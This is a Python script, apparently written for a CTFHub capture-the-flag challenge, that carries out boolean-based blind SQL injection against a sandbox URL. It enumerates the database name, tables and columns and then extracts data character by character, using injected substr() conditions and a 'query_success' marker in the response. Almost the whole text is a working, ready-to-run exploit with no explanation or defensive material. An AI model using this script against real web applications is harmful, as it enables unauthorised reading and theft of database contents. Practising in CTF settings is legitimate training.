CTFHub布尔盲注脚本
import requests
import string
def get_database(url, mark):
database = ''
for i in range(1, 9):
for j in string.ascii_letters:
target = url + 'if(substr(database(),%d,1)="%s",1,(select table_name from information_schema.tables))' % (i, j)
r = requests.get(target)
if mark in r.text:
database += j
print(database)
break
print('Database:', database)
return database
def get_table(url, mark, database):
tablesname = []
for i in range(0, 2):
name = ''
for j in range(1, 6):
for k in string.ascii_letters:
target = url + 'if(substr((select table_name from information_schema.tables where table_schema="' +\
database + '" limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (i, j, k)
r = requests.get(target)
if mark in r.text:
name += k
print(name)
break
tablesname.append(name)
print('Tablesame:', tablesname)
return input("Choose TableName:")
def get_columns(url, mark, tablename, database):
columns = []
for i in range(0, 3):
name = ''
for j in range(1, 6):
for k in string.ascii_letters:
target = url + 'if(substr((select column_name from information_schema.columns where table_name="'\
+ tablename + '" and table_schema="' + database\
+ '" limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (i, j, k)
r = requests.get(target)
if mark in r.text:
name += k
print(name)
break
columns.append(name)
print('Columnsname:', columns)
return input("Choose Columnname:")
def getdata(url,mark,tablename,database,columns):
data = ''
for i in range(0, 50):
for j in string.digits\
+ string.ascii_letters\
+ string.punctuation:
payload = url + 'if(substr((select '\
+columns\
+ ' from ' + tablename\
+ '),%d,1)="%s",1,(select table_name from information_schema.tables))' % (i, j)
request = requests.get(payload)
if mark in request.text:
data += j
print(data)
break
print(data)
if __name__ == "__main__":
url = "http://challenge-1d65b510fd09970c.sandbox.ctfhub.com:10080/?id="
mark = "query_success"
database = get_database(url, mark)
tablename = get_table(url, mark, database)
columns=get_columns(url, mark, tablename, database)
getdata(url, mark, tablename, database,columns)